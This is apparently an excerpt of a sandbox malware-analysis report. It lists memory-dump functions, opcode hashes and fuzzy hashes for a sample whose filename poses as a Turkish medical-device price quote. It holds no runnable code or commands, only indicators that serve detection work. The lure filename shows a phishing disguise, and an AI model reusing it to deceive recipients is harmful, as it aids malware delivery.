                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 71a02d5b2a7b1d1b064fe3bfdb4d8615db58d77818fd7d8ecc5a21506c72fa4f
                                                                                                                          • Instruction ID: 9d0f2e6f9cb3cde75710527ddfef79830675850ad0db4d368a06aa6e45de04ce
                                                                                                                          • Opcode Fuzzy Hash: 71a02d5b2a7b1d1b064fe3bfdb4d8615db58d77818fd7d8ecc5a21506c72fa4f
                                                                                                                          • Instruction Fuzzy Hash: 3C91F474E1021AAFCB50DFA9C980AEEBBF2FF48310F048569E925D7290D731E991CB50
                                                                                                                          Function 07654AA1 Relevance: .2, Instructions: 171COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 06ee74d5bdfe12a407694f1053ee06fafdee24a1a65ee012147294dd8cc46dfc
                                                                                                                          • Instruction ID: 72a973ac939b715189199015b338ccde7a8f0054de6e9b41fea8ac0d2313ed92
                                                                                                                          • Opcode Fuzzy Hash: 06ee74d5bdfe12a407694f1053ee06fafdee24a1a65ee012147294dd8cc46dfc
                                                                                                                          • Instruction Fuzzy Hash: 51710375910619CFDB10DF68C980AD9FBB1FF49314F05C299E909AB311EB30AA89DF90
                                                                                                                          Function 07650C38 Relevance: .1, Instructions: 147COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8943f6518851105fddc8a04a761ec6f6b04657b2275798cb11d27846168a392c
                                                                                                                          • Instruction ID: 9b194145654928543ca9f7953d928be085ace8947fff81100a13d68012022ee8
                                                                                                                          • Opcode Fuzzy Hash: 8943f6518851105fddc8a04a761ec6f6b04657b2275798cb11d27846168a392c
                                                                                                                          • Instruction Fuzzy Hash: 1E510C71A1060A8FCB54DFB8C8948ADF7B5FF89310F109669E816B7314EB30E985CB50
                                                                                                                          Function 07653498 Relevance: .1, Instructions: 146COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: dcde21a8d6c8a814a82683e149aa14739b6dbd31e8d700103524fe1b7b8369d4
                                                                                                                          • Instruction ID: 61d0b7304817b18bbdc04c2ae71632ade23a770b2a3992dada1169be572ab2af
                                                                                                                          • Opcode Fuzzy Hash: dcde21a8d6c8a814a82683e149aa14739b6dbd31e8d700103524fe1b7b8369d4
                                                                                                                          • Instruction Fuzzy Hash: 43515DB0E00209CFCB19DF79D49869DBBF2AF89754F158169E806AB361DB31CC46CB54
                                                                                                                          Function 0622B670 Relevance: .1, Instructions: 134COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 83cd490b837ad99c91a56642f1f2066a5e73c3a41f2139ce23cd3684dfe1fcfc
                                                                                                                          • Instruction ID: f2effed9b4b7891d0fb5b8f32b8f578aa71fe4b27424e0f9c40576b7b1a41f04
                                                                                                                          • Opcode Fuzzy Hash: 83cd490b837ad99c91a56642f1f2066a5e73c3a41f2139ce23cd3684dfe1fcfc
                                                                                                                          • Instruction Fuzzy Hash: FF41B3B1F74237BFEBC5AF64C84A6EE3BB1EF44240F514426EC01A6255F6708A50CAD1
                                                                                                                          Function 07651800 Relevance: .1, Instructions: 132COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b2e0a6f58c239199e8bdc9610dafbc21cd2fb6ace478277896cb162a83825eee
                                                                                                                          • Instruction ID: 3ff3566aff4c19afdaa02575f590f8f656e5250e43ae7c7adcf35c855bb2716b
                                                                                                                          • Opcode Fuzzy Hash: b2e0a6f58c239199e8bdc9610dafbc21cd2fb6ace478277896cb162a83825eee
                                                                                                                          • Instruction Fuzzy Hash: 61418EB0A1120ADFDB28DF74D458BAEB7B6BF86301F148169E80697390DE35DC41DB52
                                                                                                                          Function 07650E40 Relevance: .1, Instructions: 131COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 70a33b43f6dfe0cf0269506e38bd88a5c5e8c241864258b7277d9e85ddcd59b3
                                                                                                                          • Instruction ID: fc4fab96090584c648fd1afd487a525a44e54e32bb164f6590777d3955fd3e0c
                                                                                                                          • Opcode Fuzzy Hash: 70a33b43f6dfe0cf0269506e38bd88a5c5e8c241864258b7277d9e85ddcd59b3
                                                                                                                          • Instruction Fuzzy Hash: 6151A431A10609DFCB00EFA8D8848EDFBB5FF89304F00855AE516AB321EB31A945CB91
                                                                                                                          Function 0622C070 Relevance: .1, Instructions: 126COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ec43b1d4e4c718a6ea05922b3d2aeec8619240fd46174911cb6eda8afc66cc83
                                                                                                                          • Instruction ID: 511b596594c6cc2ad118c50c367e5c974825036f666f6f528e42a762bdd5d577
                                                                                                                          • Opcode Fuzzy Hash: ec43b1d4e4c718a6ea05922b3d2aeec8619240fd46174911cb6eda8afc66cc83
                                                                                                                          • Instruction Fuzzy Hash: B341F870F74277BFDBC6AF64C84A6AE7BB0AF45240F100466EC41A7295E6B48950CBD1
                                                                                                                          Function 07650C2B Relevance: .1, Instructions: 125COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: bdfce39da9b6f027c30a17ce2ca585e7bc2624c4a957f0ef2914cb9cc206a272
                                                                                                                          • Instruction ID: f60a1de19157ec428cd4a61c5196355a211de96311774ae2b1c782278b34513e
                                                                                                                          • Opcode Fuzzy Hash: bdfce39da9b6f027c30a17ce2ca585e7bc2624c4a957f0ef2914cb9cc206a272
                                                                                                                          • Instruction Fuzzy Hash: ED416D71A0060A8FCF50DFB4C8805ADFBB1FF89310F118669E856AB315EB34E985CB90
                                                                                                                          Function 0622B6A0 Relevance: .1, Instructions: 124COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 631b89157018d82921cbac63339abe6a96536c0fdda411d0a515943210eb96f9
                                                                                                                          • Instruction ID: b4de1976d22811ada44d1c48d0d85d3671083f8acb06c84160c98affe8881d80
                                                                                                                          • Opcode Fuzzy Hash: 631b89157018d82921cbac63339abe6a96536c0fdda411d0a515943210eb96f9
                                                                                                                          • Instruction Fuzzy Hash: 594182B0F7413BBFDBD5AF64C84A6AE77B0EB44240F504425EC02A7294F6B5CA90CAD1
                                                                                                                          Function 07653478 Relevance: .1, Instructions: 122COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4ca8b6e91ba051a6a4314d5a8711542c75a874ecbbc23a01b754e64fd344660e
                                                                                                                          • Instruction ID: 6ad250293ace41939e8e962c7bafe753b222a3019cabe5ff214cb83d5588a704
                                                                                                                          • Opcode Fuzzy Hash: 4ca8b6e91ba051a6a4314d5a8711542c75a874ecbbc23a01b754e64fd344660e
                                                                                                                          • Instruction Fuzzy Hash: 1E417BB1E002058FCB18DF79D49869DBBF2AF89714F24806EE846AB361DB70CC46CB54
                                                                                                                          Function 0622AC68 Relevance: .1, Instructions: 121COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 77d7b3fc0d1d13c5a8b7713dc60c5e19643d5c735e3b373c34b23e2908a7fa71
                                                                                                                          • Instruction ID: 059f21fd42cbd01ff734f1d24e0282e4f2843b886b1410351735a86a3f0a471f
                                                                                                                          • Opcode Fuzzy Hash: 77d7b3fc0d1d13c5a8b7713dc60c5e19643d5c735e3b373c34b23e2908a7fa71
                                                                                                                          • Instruction Fuzzy Hash: 36416E30E2121AAFDB54DF68D850AECBBF2AF89301F148569E841FB3A0DB71D941CB50
                                                                                                                          Function 062237A7 Relevance: .1, Instructions: 117COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 84dcabba542c73d963a9ef67ab9f5c35d6fd72d58a8683808e76f7bc4d2bb064
                                                                                                                          • Instruction ID: 8d845a523ebf7463d0276df11ba89bcd47752d63aeddb9f3e43267abe1612771
                                                                                                                          • Opcode Fuzzy Hash: 84dcabba542c73d963a9ef67ab9f5c35d6fd72d58a8683808e76f7bc4d2bb064
                                                                                                                          • Instruction Fuzzy Hash: 7F413C31A1021AEFDF19DF64D844AAE77B7FF94350F148029ED029B294DB389C56CB91
                                                                                                                          Function 0622AC78 Relevance: .1, Instructions: 115COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6e504c8cb0a1b577b83d2cd50fbfe6a4f91fab87db1880c7c01847ed3ced042f
                                                                                                                          • Instruction ID: bc378013922a371560430fe4ea6f8c145a971ce542d91465a61c2f7334c8209b
                                                                                                                          • Opcode Fuzzy Hash: 6e504c8cb0a1b577b83d2cd50fbfe6a4f91fab87db1880c7c01847ed3ced042f
                                                                                                                          • Instruction Fuzzy Hash: FC414F30E2121AAFDB54DF69D850AADB7F2AF89311F148569E841BB3A0DB70DD41CB90
                                                                                                                          Function 07657A46 Relevance: .1, Instructions: 106COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d4c3ae316a86a3f75a9954618b4e02ab41bf1093495cbf3046b37cca48bb013c
                                                                                                                          • Instruction ID: a858a502a9d5041b1e733c5ac143928b447a954f7847c16c6c733e7efb1bcfc0
                                                                                                                          • Opcode Fuzzy Hash: d4c3ae316a86a3f75a9954618b4e02ab41bf1093495cbf3046b37cca48bb013c
                                                                                                                          • Instruction Fuzzy Hash: 493107B4A1D3858FDB156B70D82826FBFB2AB97211F0405A7D943C7282CA384D42D7A2
                                                                                                                          Function 07651198 Relevance: .1, Instructions: 100COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 00d8ce30538f08efbae96fb76f472bd070e4847d62d6af0b986c3e52a7eb11b5
                                                                                                                          • Instruction ID: 2a698099c68d96fbe8971f6f1c81762c0c922fa54097860fc158b482c167eeaa
                                                                                                                          • Opcode Fuzzy Hash: 00d8ce30538f08efbae96fb76f472bd070e4847d62d6af0b986c3e52a7eb11b5
                                                                                                                          • Instruction Fuzzy Hash: 58318371E10219DFCB18DFA8D844AADB7F6FF89210F10826AD906A7360DB319C41CB91
                                                                                                                          Function 07656B44 Relevance: .1, Instructions: 98COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 68c0320ac66b4faf8f089a6c47d9d49254295a59976eae4e6a1c6dc3bf6c6cf4
                                                                                                                          • Instruction ID: 2b2656c633c5f8573215d3c43b1928c0844e22723cfe2103956a9ebdae601023
                                                                                                                          • Opcode Fuzzy Hash: 68c0320ac66b4faf8f089a6c47d9d49254295a59976eae4e6a1c6dc3bf6c6cf4
                                                                                                                          • Instruction Fuzzy Hash: 4B31E1B0A14209CFD704CB58D4517AAB7F2EB8AB18F94845AC9179F381CB359C83EF91
                                                                                                                          Function 07652D88 Relevance: .1, Instructions: 92COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a6a0eb224397133da33d39c5b36e40a85f5d2a5f9965c8bed1e53f6a1826967b
                                                                                                                          • Instruction ID: 1039a101ddac1a26519165a092d87a2295863b977241764878281470680568a1
                                                                                                                          • Opcode Fuzzy Hash: a6a0eb224397133da33d39c5b36e40a85f5d2a5f9965c8bed1e53f6a1826967b
                                                                                                                          • Instruction Fuzzy Hash: 513181B1A012069FDB14DF64D854BAEBBF6FF88200F14892EE8569B290CB759D45CB50
                                                                                                                          Function 0622C4B8 Relevance: .1, Instructions: 92COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 16fdf9157a60924213ac0e31dbadf4244b2de62db3d7222ad6c77a779c1cfd9c
                                                                                                                          • Instruction ID: f8568d6581a59d86c7cea1e10b940d464268895bb7e50d23cf73553c777318a8
                                                                                                                          • Opcode Fuzzy Hash: 16fdf9157a60924213ac0e31dbadf4244b2de62db3d7222ad6c77a779c1cfd9c
                                                                                                                          • Instruction Fuzzy Hash: 7F315D71A2011A9FCB90DFA8C984AEDB7F1EF49300F1445A9E905EB261DB71DE50CF50
                                                                                                                          Function 076522F0 Relevance: .1, Instructions: 90COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a8e6b42a153ab1b1e93d0828a171a903d1deb0b4fbe7df52242375cc7aa1c5d0
                                                                                                                          • Instruction ID: aab771c3195e6ce02c6b9fcffcbd57bd837a89b926337c02633872cde28ddc15
                                                                                                                          • Opcode Fuzzy Hash: a8e6b42a153ab1b1e93d0828a171a903d1deb0b4fbe7df52242375cc7aa1c5d0
                                                                                                                          • Instruction Fuzzy Hash: 81319AB13002018FE764DF79E894A6B77E6FB89210F148469E90ACB365DB30AC428B61
                                                                                                                          Function 076517F0 Relevance: .1, Instructions: 87COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d63b89a2b59b604b4ae60ed85892cf5913fc29e43835ae21db2202250082d7c9
                                                                                                                          • Instruction ID: 8d44d02b71c387978e2776988faefd3e299d3617785e4ab30199048e5c6a89f6
                                                                                                                          • Opcode Fuzzy Hash: d63b89a2b59b604b4ae60ed85892cf5913fc29e43835ae21db2202250082d7c9
                                                                                                                          • Instruction Fuzzy Hash: 0631B0B4A1130A9FDB28DF64D5587AE7BB6AF8A301F184169E803D7390CE35CD41DB52
                                                                                                                          Function 07657A80 Relevance: .1, Instructions: 85COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9d39a42a2b1d0756f682394112e70b5d494c1fb598d9da20063622932546bd42
                                                                                                                          • Instruction ID: a42b68a57807f8fbadebab5a9fd5c6dc3808c14041c5652c9b2819720678d255
                                                                                                                          • Opcode Fuzzy Hash: 9d39a42a2b1d0756f682394112e70b5d494c1fb598d9da20063622932546bd42
                                                                                                                          • Instruction Fuzzy Hash: C82171B4B64215CBEB18AF64D81C26FB6B7BBA5211F104525DE03D7340DA744E42ABA2
                                                                                                                          Function 06229240 Relevance: .1, Instructions: 85COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7b7820d336c9d325381277f3b4c8d9dd6578347faeaa9f1d4c29a9e66ffe9622
                                                                                                                          • Instruction ID: 2ad34dbaa2505ca8a4d3ca5f7a3aa584784077ca00dac2a8c2a630a7642a7769
                                                                                                                          • Opcode Fuzzy Hash: 7b7820d336c9d325381277f3b4c8d9dd6578347faeaa9f1d4c29a9e66ffe9622
                                                                                                                          • Instruction Fuzzy Hash: 76212476F202225FEB248A65C8815BE7BF6EB85210F18856AD986D3694C634ED80C761
                                                                                                                          Function 06223007 Relevance: .1, Instructions: 85COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7fef78dd8ba962484291538f66ce7906331afbc8f6c24c852eaebae88850a30c
                                                                                                                          • Instruction ID: 5be16c66bc4a8bfc255adc173af269cf09d60a1b3eb9ba8b9fb11a4a8ae71c4c
                                                                                                                          • Opcode Fuzzy Hash: 7fef78dd8ba962484291538f66ce7906331afbc8f6c24c852eaebae88850a30c
                                                                                                                          • Instruction Fuzzy Hash: FA319135E1021AAFCF45CFA4E944ADE7BB2EF48351F044069E901BB350DB799E51CBA1
                                                                                                                          Function 07656568 Relevance: .1, Instructions: 84COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b23d305b41afe31971140005503479780ac49a91e7b89c22ef9b9898b39ad2b7
                                                                                                                          • Instruction ID: 2211e934648084106e3b8efc5245e9ca13c3808e337253f0d974ad2720714de8
                                                                                                                          • Opcode Fuzzy Hash: b23d305b41afe31971140005503479780ac49a91e7b89c22ef9b9898b39ad2b7
                                                                                                                          • Instruction Fuzzy Hash: E13116B4E2020A9FDB04DFB8D9446EEBBF2AB48210F504569D916F7250EB309A01DBA1
                                                                                                                          Function 0765C318 Relevance: .1, Instructions: 83COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5ba779d142633e923964adc04a9e78d907db120a9be64aa403a088bb67a800a1
                                                                                                                          • Instruction ID: 293af9cb7254a6239bfa3d0127e53d917dd4fedf18758c9161481ee94c19f800
                                                                                                                          • Opcode Fuzzy Hash: 5ba779d142633e923964adc04a9e78d907db120a9be64aa403a088bb67a800a1
                                                                                                                          • Instruction Fuzzy Hash: DB21D6B071870BCBD6248A19C854B7A72A7BBC6700F248026DC474F784CAB1CC43A773
                                                                                                                          Function 06229728 Relevance: .1, Instructions: 82COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4802e7fc6231f3f041fe0a16de55fe82cd372e66be65536df88e5e0abc7c423f
                                                                                                                          • Instruction ID: f9e779ca1d1477ecaf617b3f2fc1b111282cc95dd03fa9cb41c9d5f8d217cf80
                                                                                                                          • Opcode Fuzzy Hash: 4802e7fc6231f3f041fe0a16de55fe82cd372e66be65536df88e5e0abc7c423f
                                                                                                                          • Instruction Fuzzy Hash: C0212470E30227EBDB91BB78C4441ABBBB0EF41210F11496ACC16A7644FB76D951CBD1
                                                                                                                          Function 0622AB00 Relevance: .1, Instructions: 82COMMON
                                                                                                                          Download Yara Rule
